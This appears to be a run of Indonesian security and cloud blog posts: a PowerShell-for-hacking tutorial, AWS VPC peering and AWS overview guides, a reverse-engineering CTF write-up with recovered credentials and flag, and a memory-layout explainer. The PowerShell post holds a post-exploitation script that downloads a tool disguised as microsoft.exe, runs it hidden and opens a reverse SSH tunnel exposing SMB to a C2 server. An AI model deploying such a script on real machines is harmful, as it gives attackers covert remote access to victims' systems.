Karena powershell itu tersedia secara default pada operating system windows jadi mempelajari powershell sangat berguna saat kita mendapatkan initial access pada windows machine jadi sesuai topik ini yaitu Powershell for hacking jadi kita akan belajar basic command serta melihat command apa saja yang sering dipakai pada powershell pada saat melakukan hacking/post-exploitation

Sebelum kita memulai kita perlu mengenal yang namanya cmdlet, cmdlet merupakan namming pattern yang berisi kata kerja dan kata benda pada suatu command jadi misalkan command Get-ChildItem yang digunakan untuk listing directory jadi Get merupakan kata kerja sementara ChildItem merupakan kata benda. cmdlet itu ada banyak sekali tetapi kita tidak perlu menghafalnya cukup kita perlu menginggat 2 command saja yaitu Get-Command yang digunakan untuk menampilkan semua atau spesifik nama dari cmdlet pada powershell dan command kedua ada Get-Help yang berfungsi untuk melihat detail dari cmdlet tersebut seperti argument dan penggunaan pada command cmdlet

Ada 3 CommandType yang ada pada powershell dimana di klasifikasikan menjadi 3 yaitu Alias, Function dan terakhir yang kita bahas tadi yaitu cmdlet jadi mari kita bahas:

Alias : Bisa dibilang alias ini seperti singkatan dari cmdlet dan function dari powershell dan kita bisa mudah melihatnya menggunakan command get-alias

beberapa command alias mirip dengan bash seperti alias cat untuk membaca file yang aslinya merupakan cmdlet dari Get-Content lalu ada alias cd dan chdir untuk berpindah directory yang juga sebenarnya merupakan command cmdlet dari Set-Location

Function : function ini sebenernya juga masuk ke cmdlet tetapi kita juga bisa melakukan custom function pada powershell atau yang dikenal dengan user defined function

Disini kita coba definisikan fungsi InfoTanggal-dan-IpAddress yang hanya menampilkan informasi tanggal dan IP Address pada local computer dan pada gambar kita bisa melihat pada blok fungsi kita memanggil cmdlet Get-Date dan alias gip yang memfilter hanya untuk menampilkan IP address

Cmdlet: Seperti yang dibahas sebelumnya, cmdlet berisi suatu perintah dasar seperti menampilkan directory, berpindah directory, membuat file, membuat folder dan banyak lagi ya, contoh cmdlet yang sering digunakan:

• Get-ChildItem : untuk listing directory
• Set-Location: Untuk berpindah directory
• Get-Content : Untuk membaca file
• Add-Content : untuk membuat file / append string jika file sudah ada
• Set-Content : Untuk membuat file / modifikasi string jika file sudah ada
• Remove-Item : menghapus file / directory
• Rename-Item : rename file / directory
• Copy-Item : salin file / directory
• Move-Item : pindahkan file / directory

Sebenarnya masih banyak lagi ya cuman kalian bisa explore sendiri untuk lebih lengkapnya, nah disini misalkan kasusnya kita tidak mengerti bagaimana cmdlet Add-Content bekerja kita bisa mudah menggunakan command Get-Help Add-Content untuk menampilkan informasi bantuan pada cmdlet tersebut

Nah ditampilkan informasi argument apa saja yang dibutuhkan, tenang saja kita tidak membutuhkan semua argument hanya argument yang wajib/required kita gunakan yaitu -Path yang merupakan nama file dan -Value isi pada string dan jika kurang jelas kita bisa melihat di dokumentasi microsoft pada link yang sudah disertakan pada output atau bisa juga menggunakan command Get-Help nama_cmdlet -Full

Disini sangat detail karena disertakan hingga penjelasan dari parameter yang required dan opsional jadi langsung saja kita coba

Disini kita memakai cmdlet Add-Content untuk membuat file serta kita coba baca dari file yang kita buat memakai cmdlet Get-Content, semudahh itu kan

Setelah kita tau cmdline, alias dan function sekarang kita akan membahas pipeline, nah apa itu ?? jadi pipeline itu suatu cara pada powershell yang digunakan untuk mengarahkan output ke command lain menggunakan satu baris command dan hal ini berguna misalkan untuk sorting string, mencari string tertentu dalam file/output, memfilter output, melakukan operasi pada string yang dipilih dan masih banyak lagi.

Sama seperti pada bash, pipeline pada powershell juga menggunakan special character |(pipe) tetapi karena powershell semua command di respresentasikan sebagai object jadi kita bisa melakukannya lebih mudah

Kita mulai dengan cmdlet Get-Service yang berguna untuk menampilkan semua service pada computer

Dan disini kita hanya akan memfilter nama pada service jadi kita bisa dengan mudah menggunakan pipeline dan diikut dengan cmdlet Select-Object

Sangat mudah bukan, dimana kita melakukan Select-Object Name dimana Name merupakan parameter Name diambil dari column dari output Get-Service, Nah sekarang kita akan menampilkan hanya service yang memiliki status stop / tidak running kita dengan mudah menggunakan Where-Object

Output hanya menampilkan service dengan status stopped dan disitu kita menggunakan Where-Object diikuti dengan {$_.Status -eq “Stopped”} yang dimana hal ini merupakan rules syntax dari powershell sendiri dan $_.Status artinya kita mengambil column status dan -eq merupakan operasi komparasi sama dengan dan diikuti dengan string “Stopped”

Kita juga bisa menggunakan lebih dari 2 pipeline

Dalam kasus ini kita akan memilih service yang berstatus “Stopped” dan diikuti dengan Select-Object Name artinya kita hanya memanggil nama dari service pada output yang berarti menampilkan nama service dengan status Stopped

Contoh selanjutnya kita akan mulai bekerja dengan file yaitu menampilkan file pada current path yang lebih baru dari 30 hari sebelumnya, kita tahu jika operasi listing menggunakan Get-ChildItem

Sebelum kita memulai kita perlu tau dulu spesifikasi dari command Get-ChildItem dimana kita bisa melakukan scanning rekursif menggunakan argument -Recurse dan kita juga bisa melihat argument yang bersifat required dan bukan.

Selanjutnya kita bisa memanfaatkan pipeline untuk ini

Disini command-nya sangat sederhana pertama kita recursif scan menggunakan -Recurse dan -File merupakan argument yang hanya digunakan untuk melakukan scanning pada file bukan directory dan kita lakukan pipeline dengan where-object artinya kita akan melakukan compare dimana $_.LastWriteTime merupakan column timestamp dan -ge merupakan operasi lebih dari diikuti dengan fungsi (Get-Date).AddDays(-30) yang berarti kita mengambil tanggal sekarang dikurangi 30 hari dan lanjut melakukan select column dimana disitu kita hanya akan menampilkan fullpath dengan menggunakan argument Fullname

Contoh terakhir kita akan melihat kemampuan cmdlet untuk melihat dan melakukan konfigurasi system

Kita bisa dengan mudah menampilkan semua subkey registry HKCU menggunakan Get-ChildItem

Kita juga bisa melihat value dari hive registry menggunakan cmdlet Get-ItemProperty diikuti path dari registry key-nya

Disini kita bisa melihat autorun program yang dijalankan pada saat selesai booting diantaranya ada openvpn-gui.exe, discord, opera.exe dan lainnya ya

Dan kita bisa menghapus salah satu value dari registry tersebut menggunakan Remove-ItemProperty, disini kita akan mencoba untuk menghapus discord agar tidak dijalankan saat computer dinyalakan

Pada gambar ini, terlihat kita menghapus value dengan nama discord jadi sekarang discord tidak lagi menjadi autorun program

Powershell sendiri sebenarnya suatu utility yang sangat powerfull entah dari segi sysadmin, configuration, automation maupun pentesting karena kita bisa melakukan apapun pada machine hanya dengan input suatu command dan juga kita bisa membuat script powershell pada satu file dengan extension .ps1, jadi kita akan mencoba coding untuk menjalankan executable jadi siapkan text editor disini kita akan menggunakan vscode

oke kita bedah scriptnya, jadi pada script powershell ini digunakan untuk menjalankan suatu executable yaitu putty, putty adalah suatu aplikasi yang dipake untuk keperluan remote jaringan dan kita bisa menggunakan putty untuk komunikasi pada protocol ssh, ftp, smb dan protocol yang digunakan untuk remote login lainnya

$processName = "microsoft"

$tempDir = [System.IO.Path]::GetTempPath()
$exePath = Join-Path -Path $tempDir -ChildPath "microsoft.exe"

$downloadUrl = "http://[redacted]/putty.exe"

Sama seperti programming pada umumnya, kita bisa mendeklarasikan variable pada powershell disini kita inisialisasi variable seperti ProcessName, tempDir, exePath dan downloadUrl

function IsProcessRunning {
    param (
        [string]$name
    )
    $process = Get-Process | Where-Object { $_.ProcessName -eq $name }
    return $process -ne $null
}

if (-not (IsProcessRunning $processName)) {

    if (-not (Test-Path $exePath)) {
        Write-Host "$exePath Downloading"
        Invoke-WebRequest -Uri $downloadUrl -OutFile $exePath
        Write-Host "Success"
    }
    

    $args = @("-N", "-l", "guest", "-pw", "admin12345", "-R", "1337:localhost:445", "[redacted_host]", "-hostkey", "SHA256:xbI5/Mcj2KrXg3ykreniRYhZUs9IQGb/secret")
    Start-Process -FilePath $exePath -ArgumentList $args -WindowStyle Hidden
    Write-Host "$processName not running, $exePath"
} else {
    Write-Host "$processName running."
}

Pada fungsi IsProcessRunning berguna untuk melakukan filter process dengan 1 argument yang diambil dari variable processName dengan nama microsoft dan selanjutnya ada if statement

if (-not (IsProcessRunning $processName))

Artinya kita identifikasi apakah process microsoft itu running dan jika belum running maka dilakukan komparasi kedua apakah ada file pada $exePath yang dimana variable $exePath merupakan temporary directory dan diikuti dengan nama file yaitu microsoft.exe jika tidak ada maka akan dilakukan download pada url yang mengambil pada variable $downloadUrl dan jika ada maka lanjut pada line berikutnya

Disini ada inisialisasi array pada variable $args yang merupakan argument pada cmdlet dari Start-Process dan diikut dengan argument -WindowStyle Hidden yang berarti process akan dilakukan pada background, jadi script ini berfungsi untuk melakukan SSH tunneling dimana pada host local melakukan port forwarding dari 445(smb) ke server c2 dengan port 1337 sehingga login smb pada local computer bisa dilakukan remote pada c2 server dengan port 1337.

Penutup

mungkin itu saja penjelasan fundamental mengenai powershell scripting, yang dimana memang powershell ini sangat usefull terlebih lagi di sisi cybersecurity saat melakukan pentesting/CTF pada windows machine dan semoga artikel ini bermanfaat dan bisa dijadikan refrensi untuk kedepannya.

“Orang bijak belajar ketika mereka bisa. Orang bodoh belajar ketika mereka dipaksa.” -Arthur

Refrensi:

https://learn.microsoft.com/en-us/powershell/scripting/learn/ps101/04-pipelines?view=powershell-7.4

https://learn.microsoft.com/en-us/powershell/scripting/overview?view=powershell-7.4

https://www.techtarget.com/whatis/definition/cmdlet

https://juggernaut-sec.com/autorun-startup-registry-keys

Artikel Powershell for hacking, dasar command pada powershell pertama kali tampil pada Bhineka blog.

Ok! menurut mu bagaimana? apakah sudah lengkap teori yang aku sampaikan? jika sudah mari lanjut ke praktek. Pastikan kamu sudah memiliki akun AWS. Di artikel ini kita akan membuat dua region yaitu Virginia dan Region Singapore yang memiliki masing-masing satu instance private saling terhubung

Membuat Kustom VPC Baru

Hal pertama yang harus kita lakukan adalah membuat VPC di kedua region. kita akan membuat di region virginia terlebih dahulu!

Cari dahulu service VPC pada kolom pencarian (kotak kuning) setelah itu pilih menu VPCs (kotak orange). Setelah klik menu VPCs maka akan di arahkan ke halaman daftar VPC yang ada, karena kita akan membuat VPC baru, pada bagian kanan atas klik tombol “Create VPC” (kotak orange) untuk ke halaman membuat VPC nya.

Setalah itu, klik “VPC and more” untuk mengatur VPC dengan cara yang lebih mudah, seperti gambar dibawah ini.

Untuk pengaturan nya, pertama tentukan nama VPC, pada artikel ini aku menggunakan nama “new-vpc”, kemudian tentukan IPv4 CIDR Block, disini aku menggunakan bawaan saja, kemudian Number of Availability Zones (AZs) pilih 1, kemudian Number of public subnets pilih 1, kemudian Number of private subnets pilih 1, NAT Gateway pilih None (karna NAT Gateway itu berbayar), kemudian VPC Endpoint pilih None. lengkap nya seperti gambar dibawah ini.

Klik “Create VPC” untuk membuat VPC! setelah itu tunggu saja. Klik “View VPC” untuk melihat hasil dari VPC yang telah dibuat

Membuat EC2 Instance Private Dan Public

Setelah VPC baru dibuat, maka selanjutnya membuat instance pada new-vpc yang baru dibuat. cara nya, cari “EC2” pada kolom pencarian lalu klik, maka AWS akan membawa kamu ke halaman EC2.

Setelah di arahkan ke halaman instance, klik tombol “Launch Instance” pada pojok kanan atas, untuk membuat instance baru. Step selanjutnya aku membuat sebuah instance private.

Setelah diklik tentukan nama instance, OS instance (pilih ubuntu dan pastikan free tier), instance type (pastikan free tier), key pair (ssh), network setting. Contoh nya seperti gambar dibawah ini.

Untuk key pair, kamu bisa “Create new key pair”, berikan nama lalu klik “Create key pair”.

Kemudian pada bagian Network Setting pada kolom VPC, pilih ke VPC yang baru kita buat sebelumnya, kemudian subnet pilih yang ada kata private, kemudian Auto-assign public IP pilih disable (agar tidak diberikan IP publik), kemudian secury group secara default akan menambahkan rules mengizinkan koneksi ssh, tetapi disini aku menambahkan rules mengizinkan ALL ICMP-IPv4 dengan source type Anyware. Lengkap nya tersaji pada gambar dibawah ini.

Setelah konfigurasi instance selesai, klik “Launch instance” pada kanan pojok bawah.

setalah di klik, makan AWS akan membuat instance yang sesuai dengan konfigurasi kita sebelumnya.

Selanjutnya membuat instance publik sebagai bastion host (ini nanti digunakan untuk mengakses instance private), cara nya sama saja beda nya pada saat konfigurasi Network Setting. Di sini aku membuat instance publik dengan nama virginia-instance-2.

Uji coba instance, pada instance virginia-instance-2, klik “Connect” pada halaman instance.

Setelah itu klik “Connect” seperti gambar dibawah.

Uji coba pertama adalah dengan melakukan ping ke google.com, lalu kedua ping ke instance private

IP instance private adalah 10.0.135.68.

Dua uji coba diatas menunjukan bahwa instance publik berhasil terhubung ke internet dan berhasil terhubung ke instance private, untuk instance private tidak bisa dilakukan uji coba seperti instance publik, karena instance private tidak memiliki IP publik. Untuk terhubung ke instance private, cara nya adalah dengan ssh, gunakan ssh pari key yang telah di download secara otomatis sebelumnya. Copy konten keynya lalu salin ke instance publik, berikan izin 400. Cara menggunakannya seperti ini:

ssh -i key.pem ubuntu@10.0.135.68

contoh nya seperti ini.

testing ping google.com dan IP private dari instance publik

Pada gambar di atas tersaji informasi bahwa instance private tidak dapat ping google.com dikarenakan tidak memiliki akses internet, tetapi instance private bisa ping ke IP private dari instance publik.

OK sudah selesai sampai disini, untuk tugas kalian, buatkan seperti diatas untuk region kedua! karna aku tidak akan membahas nya untuk kedepan nya. selanjutnya konfigurasi VPS Peering, jadi aku akan menghubungkan instance private yang berbeda region ini dengan VPC Peering.

Konfigurasi VPC Peering Antar Region

Klik tombol “Search” pada bagian kanan atas, cari VPC, kemudian pada sidebar pilih menu “Peering Connections”. Perlu di artikel ini peering akan dilakukan pada region virginia. Setelah masuk ke menu Peering Connnections, klik tombol “Create peering connections” pada pojok kanan atas.

Setelah di arahkan ke halaman untuk membuat Peering, isi kolom nama, Select a local VPC, Select another VPC seperti gambar dibawah ini:

Penjelesan

Pada bagian “Name” digunakan untuk memberi nama koneksi peering. bagian “Select a local VPC” digunakan untuk memilih VPC yang ingin di hubungkan. “Select a local VPC to peer with” terdapat VPC ID yaitu ID VPC di region virginia yang sebelum nya kita buat, kemudian bagian “Select another VPC to peer with” terdapat Account, pilih saja My Account karna koneksi dari akun yang sedang digunakan, pada bagian region pilih Another Region dikarenakan peering akan dilakukan antar region, kemudian pilih region yang ingin di hubungkan lalu masukan VPC ID region yang ingin dihubungkan. Setelah semua sudah benar, klik tombol “Create Peering Connection” pada bagian bawah. Maka hasilnya akan seperti gambar dibawah.

Setelah berhasil di buat, silahkan pindah ke region singapore, ke menu Peering Connection, pilih peering connection, klik “Action” lalu pilih Accept Request”. Setalah itu tunggu hingga Provisioning selesai.

Jika sudah active, pilih menu Route Tables (region virginia), pilih subnet private, lalu edit routes.

Setelah itu add route, masuk kan Destination yaitu CIDR dari VPC region Singapore, lalu target pilih Peering Connection kemudian pilih peering yang telah berhasil di hubungkan sebelumnya, Setelah itu “Save Changes”.

Lakukan hal yang sama pada region Singapore, pastikan Destination CIRD dari VPC region virginia.

Uji Coba Koneksi Peering Antara Instance Private Pada Kedua Region

Uji coba dilakukan dengan menggunakan bastion host lalu gunakan pair key untuk terhubung ke instance private. Uji coba pertama yaitu instance private dari region singpore ke instance private region virginia.

IP instance private singapore: 192.168.1.74
IP instance private virginia: 10.0.135.68

Uji coba kedua yaitu instance private dari region virginia ke instance private region singapore.

Sekian terima kasih, jika ada pertanyaan, silahkan isi kolom komentar di bawah

Artikel Implementasi VPC Peering Pada Koneksi Antar Private Instance: Panduan Lengkap untuk Pemula pertama kali tampil pada Bhineka blog.

Bisa dibaca pada hint dan deskripsi dari challenge disana tertulis jika kita diharuskan untuk membongkar suatu executable file yang diberikan untuk mendapatkan suatu flag dan disitu aku juga menuliskan hint REST API yang nantinya ini bakal berguna saat kita memulai untuk melakukan analysis.

Karena banyak sekali yang mengeluh RE itu suatu topik yang sulit dan memang benar kalo misalkan kita tidak punya pengetahuan dasar jadi disarankan sebelum temen temen belajar Reverse Engineering ada baiknya temen temen mempelajari dulu beberapa konsep dasar dan fundamental tentang programming, memory layouting, cara kerja compiler/linker dan yang lebih penting bagaimana suatu program itu dibuat agar lebih memahami flownya.

Oke kembali ke topik utama, pertama kita lakukan download dulu file .exe pada URL yang diberikan dan langkah awal kita langsung jalankan programnya untuk melihat fungsi dari programnya

Programnya sangat sederhana yaitu dalam UI-nya ada textbox dan suatu button dimana jika dilihat pada labelnya kita diharuskan untuk meng-inputkan suatu License Key.

Jika dilihat pada archive zipnya didalam folder re_chall terdapat 2 libray atau DLL(dynamic library link) yaitu libcurl.dll dan zlib1.dll dimana DLL file ini digunakan untuk external library yang mana function-function dari .dll file ini digunakan didalam source code pada program yang mana jika kita menghapus .dll file ini program akan error, jelas saja karena memang ini file krusial yang di include oleh program.

Disini untuk identifikas awal kita bisa menggunakan command file untuk mengetahui deskripsi dari executable

Jika dilihat dari output command file menunujukkan x86-64 Mono/.Net assembly yang arinya merupakan binary yang di build diattas plaform .NET dimana .NET merupakan suatu  plaform open source yang menyediakan fungsionalitas seperti libray, dependency, module dsb unttuk membuat suatu aplikasi dan bahkan .NET bisa berajalan pada cross platform.

Disini kitta mengetahui jika executable ini di compile menggunakan .NET SDK jadi untuk memulai RE kita bisa menggunakan tools .NET decompiler dan disini kita akan menggunakan salah satu tools yang powerfull yaitu dnSpy yang berfungsi untuk debugger dan assembly editor pada aplikasi yang di build menggunakan .NET

Setelah dibuka pada dnSpy kita bisa melihat dan explore component yang digunakan pada program disitu ada berbagai macam, untuk text program menggunakan label, untuk input menggunakan textbox dan disitu juga disertakan name pada masing masing component. Disini kita akan fokus pada submit_click yaitu component button karena kita tau dalam program setelah dilakukan submit button program akan melakukan action untuk validasi license key.

Hasil decompile dari code yang terdapat pada form submit_click yang pastinya sangat tidak readable ya disini karena hasil decompiling ini merupakan suatu pseudo code bukan code aslinya jadi kita akan melakukan static analysis manual dengan mencoba membaca result codenya

Disini sangat jelas jika program menggunakan bahasa c++ karena ada beberapa namespace c++ yang dipanggil seperti std::char dan std::string.

Saat melakukan source code review disini ditemukan suatu instansiasi libcurl bisa terlihat pada function curl_easy_init() dan curl_easy_setopt, seperti yang tertulis pada hint yaitu REST API yang mungkin program melakukan suatu request HTTP jadi mari coba kita lakukan capture pada wireshark

Dan tidak ada result pada saat di filter di protocol HTTPhmm jadi mungkin saja memang host sudah memakai SSL jadi kita coba saja filter menggunakan protocol SSL/TLS

dan ya banyak sekali outputnya jadi kita perlu melakuan filter manual untuk menemukan suatu endpoint REST API dan karena memakai SSL semua request di enkripsi jadi disini kita tidak bisa melihat raw plain-text dari http request tapi dari sini kita bisa menemukan IP address beserta alamat port yang digunakan pada program

Jika kita melihat lagi lebih jauh disini ditemukan ada suatu SSL handshaking pada IP address 103.84.207.73 di pot 3000 dan jika kita melihat SNI(server name indication) yang merupakan extension dari protokol TLS yang menunjukkan cyber-uph.lol jadi kita akan coba akses melaui browser pada https://cyber-uph.lol:3000

Tetapi pada saat diakses dari browser di homepage-nya terdapat response 404 dan juga pada header http disana ter-include X-Powered-By: Express yang bisa disimpulkan jika backend dibuat menggunakan node.js framework yaitu express.

Disini kita perlu mengetahui path endpoint yang digunakan untuk melakukan validasi license key jadi kita akan melakukan analysis lebih lanjut lagi pada program dan jika kita mencoba membaca pada instance curl kita menemukan deklarasi URL di function curl_easy_setopt

yang mana stiring ??_C@_0CH@MEIFFGMC@https?3?1?1cyber?9uph?4lol?33000?1priv@ jika kita bersihkan menjadi https://cyber-uph.lol:3000/priv dan pada saat diakses tetap saja response masih menunjukkan 404 jadi cara cepatnya kita bisa menggunakan utility string dan grep pada string cyber-uph.lol

Dan sekarang ditemukan endpoint yang benar dan langsung coba kita akses pada browser

Sepertinya memerlukan semacam authorization untuk mengakses endpoint /privateData dimana hal ini disebut basic http authentication jadi kita memerlukan suatu credential agar bisa mengakses endpoint tersebut jadi kita perlu analisys lagi

Jika kita explore lagi pada pseudo code kita bisa melihat disana ada suatu user defined function yaitu base64coyy yang kemungkinan besar program melakukan encode dan decode memakai base64

Nah disini ada suatu deklarasi array dan juga while loop untuk operasi string dimana kita bisa melihat dari string yang di assign pada variable untuk membaca string kita perlu mengikuti pola decompiler

Kita bisa melihat pola string seperti ??_C@_0L@KGCJHHFD@keyLicense@; yang sebenarnya string asli merupakan KeyLicense jadi patternya ??_@string_sampah@string_aslinya@ jadi kita bisa langsung mengambil string aslinya

Jika kita melihat pada operasi berikut sederhananya operasi tersebut melakukan append string karena memang hasil dari decompile terlihat sangat rumit jadi kita sekarang mencoba membuka pada hex editor dari string tersebut

Karena tadi kita mendapatkan petujuk yaitu function base64coyy sekarang kita perlu identifikasi string dengan encoding base64 dan kita menemukan 3 string yaitu:

y92cwwGZ

uxWYrFmYhJl

cwMXYn5GM3pDajVGdphmY

Tetapi pada saat dilakukan decode encoding bukan base64 dan menampilkan invalid input

Dan jika kita melihat lagi pada source code terdapat function strrev yang mengambil argument dari string base64 yang di append jadi kita bisa coba melakukan reverse/membalikkan string agar dapat kita lakukan decoding

Saat dilakukan pembalikkan string, kita berhasil melakukan decode dengan plaint-text bhitech:w0ngas0rRabakalndl0sor jadi memang pada http auth username dan password dilakukan pemisahan pada character : artinya berarti bhitech merupakan username dan w0ngas0rRabakalndl0sor adalah passwordnya jadi langsung kita coba pada http auth

hmm ternyata masih gagal atau username/password salah yang berarti analysis static saja belum cukup jadi kita langsung mulai menggunakan x64dbg untuk analysis dynamic yaitu analysis program pada saat runtime/berjalan

Kita buka dan running pada x64dbg dan melihat behaviour pada program saat berjalan, lalu kita trace dan melihat informasi data di stack dan memory

Disini kita menemukan string base64 encode beserta plaintext-nya yaitu YmhpdGVjaDp3MG5nYXMwclJhYmFrYWxuZGwwc29y dan bhitech:w0ngas0rRabakaln artinya sebenarnya flow kita memang sudah benar tetapi compiler dan linker memotong string password yang sebenernya w0ngas0rRabakalndl0sor menjadi w0ngas0rRabakaln

Pada saat login menggunakan credential yang kita dapatkan hasilnya valid dan bisa dilihat REST API tersebut menyimpan kumpulan license key dan sekarang kita coba ambil 1 untuk diinputkan pada program

Dan kita coba cek dari footer response API untuk mendapatkan flagnya

bhitech{Al0n-al0n-pok0k-k3l4k0n}

Penutup

Oke jadi itu saja mungkin WriteUP pada challenge RE kali ini semoga teman teman banyak belajar juga dan lebih memahami konsep Reverse Engineering. ya sebenarnya ada reward 70K untuk yang pertama kali solve tapi berhubung tidak ada yang solve jadi uangnya mungkin nanti ku pake beli kopi golda sama rokok dan bengong mikirin dunia didepan indomaret aja hehe

“Kamu tidak perlu menjadi luar biasa untuk memulai, tapi kamu harus memulai untuk menjadi luar biasa.” – Zig Ziglar

Artikel Reverse Engineering pada executable file pertama kali tampil pada Bhineka blog.

Pendahuluan

Amazon Web Services (AWS) adalah salah satu penyedia layanan cloud computing terkemuka di dunia. Dikenal karena kemampuannya yang luas, skalabilitas, dan fleksibilitas, AWS memungkinkan bisnis dan individu untuk mengakses berbagai layanan teknologi tanpa perlu investasi besar dalam infrastruktur fisik.

Apa Itu Amazon Web Service?

AWS merupakan sebuah platform cloud yang dikembangkan oleh Amazon.com. Diluncurkan pada 2006, AWS menyediakan berbagai layanan yang mencakup penyimpanan, komputasi, basisdata, analitik, jaringan, keamanan, dan banyak lagi. AWS dirancang untuk memungkinkan organisasi dari semua ukuran untuk menggunakan sumber daya komputer secara efisien dan efektif dengan model pembayaran berdasarkan penggunaan.

Layanan Di Dalam AWS

1. Amazon EC2 (Elastic Compute Cloud)
2. Amazon S3 (Simple Storage Service)
3. Amazon RDS (Relational Database Services
4. Amazon Lambda
5. Amazon VPC (Virtual Private Cloud)
6. Amazon DynamoDB
7. AWS CloudFormation
8. AWS IAM (Identity and Access Management)

Artikel Mengenal Amazon Web Services (AWS) pertama kali tampil pada Bhineka blog.

Sebelum terlalu jauh kita membahas dulu mengenai konsep memory layouting atau tata letak memory. Jadi apa sih yang dimaksud dengan memory ?? secara gampangnya memory itu merupakan suatu refrensi yang menyimpan informasi data dan intruksi yang digunakan secara langsung pada komputer yang kita pake,  Pada saat kita membuat suatu program / software data dan intruksi akan di store pada memory dan memory sendiri terbagi menjadi beberapa segment dan dalam kasus sistem yang menggunakan 64 byte per alamat pada memory ber ukuran 8 byte sedangkan pada 32 byte ukuran alamatnya adalah 4 byte

Saat kita menjalankan suatu program ada 2 area dan processing yang dilakukan dan kita menyebutnya dengan operasi user space dan kernel space

Kernel Space

Operasi input output dan lokasi tempat code dan data kernel disimpan serta dieksekusi biasanya dijalankan melalui system call pada operating unix-like dimana jika ada suatu process yang melakukan system call interupsi akan dikirimkan ke kernel yang kemudian kernel akan melakukan eksekusi dari code yang diberikan, nah dalam hal ini code akan dieksekusi bawah ring 0

User Space

Sekumpulan lokasi dan tempat process user normal berjalan dan process yang berada pada user space ini tidak memiliki akses ke kernel space dan hanya bisa melakukan sebagian kecil operasi kernel dengan bantuan syscall(system call) seperti yang dijelaskan diatas dan umumnya sendiri kita saat memakai operating system linux semua process dan operasi yang kita lakukan ada di area ini

Nah baru disini kita akan ngebahas mengenai memori layouting

Gambar diatas ini merupakan ilustrasi dari tata letak suatu memory yang digunakan pada software/program, jadi gaperlu bingung dulu karena bagian stack, heap, bss, data ,text itu semua ada penjelasannya dan area pada memory itu disebut sebagai virtual space. Kebetulan ruang pertama ada stack dimana stack sendiri itu merupakan area untuk menyimpan semua data seperti variable, argument, parameter maupun return address pada program yang nantinya akan digunakan untuk function call, dan 2 operasi utama pada stack itu dikenal dengan PUSH dan POP dimana PUSH itu dipake untuk memasukkan nilai ke dalam stack sementara POP digunakan untuk mengambil nilai pada stack yang tentunya dengan menggunakan methode LIFO(Last in first out) artinya data yang dimasukkan terakhir akan diambil/dihapus lebih dulu ya secara gampangnya seperti tumpukan piring.

Kedua ada heap nah heap sendiri itu sebenernya sama aja untuk menyimpan suatu data seperti stack tetapi heap ini saat melakukan alokasi pada memory itu bersifat dinamis yang berarti programmer bisa melakukan management memory seperti menentukan kapan memory digunakan dan dibebaskan, dan kalo dalam bahasa C heap ini dikelola oleh fungsi malloc(), realloc() dan free(), dan di area heap ini dimulai di akhir segment bss hingga menuju ke area alamat memory yang lebih tinggi

Lalu ada BSS(block started with symbol) nah bss ini merupakan suatu segment/area pada memory yang menyimpan data yang unitialized/data yang tidak di inisialisasi seperti saat kita mendeklarasikan suatu variable static int heker; atau char namasaya[]; akan dialokasikan pada bss ini

berikutnya ada DATA dan segment ini digunakan untuk menyimpan semua data yang di inisialisasi seperti variable yang sudah kita assign atau berikan suatu nilai contoh: int a = 12; atau char nama[] = “hengker pro”; nah jadi variable atau data yang initialized akan disimpan pada segment DATA ini

Terakhir ada TEXT dimana segment ini digunakan untuk menyimpan data yang bersifat read-only seperti intruksi machine code, binary code yang udah di compile maupun informasi debug biasanya ada di segment TEXT karena read-only jadi user tidak bisa melakukan modifikasi pada segment ini

Oke jadi mungkin itu saja penjelasan dasar dari struktur pada memory serta menambah pemahaman kita mengenai stack dan heap serta fungsinya dan mungkin next artikel nanti aku akan membahas secara practical-nya dan kita melihat secara langsung implementasi stack dan heap pada memory pada program yang kita buat, see you semoga bermanfaat

Reference:

https://web.stanford.edu/class/archive/cs/cs107/cs107.1222/lectures/07/Lecture07.pdf

https://stackoverflow.com/questions/79923/what-and-where-are-the-stack-and-heap

https://unix.stackexchange.com/questions/87625/what-is-difference-between-user-space-and-kernel-space

https://www.w3schools.com/c/c_strings.php

Artikel Mengenal heap dan stack memory pertama kali tampil pada Bhineka blog.